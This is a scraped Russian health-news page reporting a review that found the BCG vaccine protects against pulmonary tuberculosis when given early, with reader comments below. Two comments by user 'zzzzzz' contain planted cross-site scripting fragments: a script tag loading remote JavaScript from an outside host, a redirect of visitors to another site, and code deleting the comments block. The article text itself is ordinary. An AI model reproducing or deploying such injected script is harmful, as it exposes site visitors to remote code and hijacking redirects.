Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вакцина, которую должен с...  >>  Вакцина, которую должен сделать каждый!
 
Обратная связь
 

Вакцина, которую должен сделать каждый!

Размер шрифта
05 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что вакцина БЦЖ является эффективным средством профилактики в борьбе против одной из самых распространенных форм туберкулеза.

Вакцина, которую должен сделать каждый!

Вакцина БЦЖ включена в детский календарь прививок во многих странах. В настоящий момент это единственная одобренная вакцина против туберкулеза.

Тем не менее, ранее считалось, что она защищает только от малораспространенных внелегочных форм этой болезни. Эффективность БЦЖ в профилактике туберкулеза легких (наиболее значимого варианта заболевания) значительно колеблется в зависимости от территории: от 0% в Южной Индии до 80% в Великобритании.

Ученые из Лондонского института гигиены и тропической медицины решили разобраться, с чем связана эта вариабельность. С этой целью они изучили весь имеющийся пласт литературы на эту тему и опубликовали обзорную статью.

Вывод оказался неожиданным: авторы обнаружили, что на самом деле БЦЖ эффективно защищает против туберкулеза легких во всех уголках планеты, включая тропические регионы.

В чем же тогда причина колоссального разброса показателей эффективности, полученных в предыдущих исследованиях? Авторы считают, что это связано с многочисленными эпизодами заражения туберкулезом перед вакцинацией, что крайне часто происходит в странах третьего мира. В этом случае эффективность БЦЖ радикально снижается.

Таким образом, результаты данной научной работы открывают новые грани БЦЖ, о которых ранее инфекционисты и не догадывались. Да, эта прививка эффективна против легочного туберкулеза, но вакцинация должна осуществляться как можно раньше и обязательно до инфицирования. Авторы убеждены, что это будет справедливо и для всех будущих противотуберкулезных вакцин.

«Это исследование позволило устранить распространенное недоразумение в области применения вакцины БЦЖ. Теперь мы точно знаем, что эта прививка защищает от самой распространенной формы туберкулеза – легочной. Однако для достижения максимальной эффективности необходимо вакцинировать ребенка как можно раньше, в идеале – сразу после рождения», – резюмирует доктор Пунам Мантани, ведущий автор исследования, специалист в области эпидемиологии.

Что ж, нам остается лишь порадоваться тому, что в России вакцина БЦЖ включена в обязательный календарь прививок. Следуйте ему неукоснительно, если вам дорого здоровье вашего малыша.

Другие секреты материнства щедро раскрываются на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:48

Комментарий удален за нарушение Правил общения

2 - kastetus

06 июня 2014 в 11:32

Цитировать   |   Пожаловаться

Существует процент риска того, что организм ребенка не справится с БСЖ прививкой, так было с ребенком моих знакомых. Но вероятность весьма мала, так что лично я за.

3 - zzzzzz

30 июня 2015 в 18:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Беременность: как обезопасить себя и будущего малыша от вирусов   Всего лишь одно изменение в жизни поможет избежать выкидыша!   Синдром Дауна может быть излечим! Новости из США!   Учителя, которые запугивают детей, снижают баллы на ЕГЭ! Остановите их, пока не поздно!  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Первые шаги вашего малыша
Как действительно избавиться от всех микробов. Часть 1

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.